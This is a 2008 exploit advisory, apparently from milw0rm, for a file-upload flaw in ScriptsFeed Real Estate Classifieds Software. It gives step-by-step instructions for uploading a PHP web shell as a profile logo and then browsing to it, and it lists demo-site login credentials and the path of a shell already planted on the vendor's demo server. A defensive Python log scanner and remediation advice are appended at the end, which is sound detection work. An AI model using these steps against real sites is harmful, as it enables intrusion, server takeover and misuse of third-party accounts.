[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script/re_images/[id]_logo_your_shell.php

First, register on the site

register: http://localhost/script/register.php

Then log in to the site

login: http://localhost/script/login.php

After that, go to profile edit

profile: http://localhost/script/profile.php

Upload your_shell.php, then right-click your logo, select Properties and copy the link

Paste it into your browser and go to your_shell.php

your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php


rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]
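An added detection example, not part of the original advisory: it scans web access log lines for requests to the `re_images/[id]_logo_<filename>` layout described above and flags stored logo names that are not plain images. The log format, the extension lists and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Stored-name layout from the advisory: re_images/[id]_logo_<uploaded filename>
UPLOAD_RE = re.compile(r"/re_images/(\d+)_logo_([^/]+)$")
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}  # assumed set of wanted logo types
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "pht", "phar"}
# Assumed log layout: ip - - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')


def suspicious_upload(target):
    """Return a reason if target is a logo upload that is not a plain image."""
    m = UPLOAD_RE.search(unquote(urlsplit(target).path))
    if not m:
        return None
    exts = m.group(2).lower().rstrip(". ").split(".")[1:]
    if not exts:
        return "no extension"
    if any(e in SCRIPT_EXTS for e in exts):
        return "script extension in stored name"  # also catches a.php.jpg
    if exts[-1] not in IMAGE_EXTS:
        return "non-image extension ." + exts[-1]
    return None


def scan_log(lines):
    """Return (ip, method, target, status, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        reason = suspicious_upload(target)
        if reason:
            hits.append((ip, method, target, int(status), reason))
    return hits


SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '203.0.113.7 - - [13/Nov/2008:17:05:25 +0000] "POST /script/profile.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [13/Nov/2008:17:05:31 +0000] "GET /script/re_images/1226595925_logo_c.php HTTP/1.1" 200 48',
    '198.51.100.4 - - [13/Nov/2008:17:09:02 +0000] "GET /script/re_images/1226590001_logo_house.jpg HTTP/1.1" 200 20480',
    '198.51.100.9 - - [13/Nov/2008:17:12:44 +0000] "GET /script/re_images/1226590777_logo_a.php.jpg HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged path means the web server served a user-supplied non-image file from the upload directory. Storing logos under server-generated names with an allow-listed image extension, and disabling script handling in `re_images/`, removes the condition this check looks for.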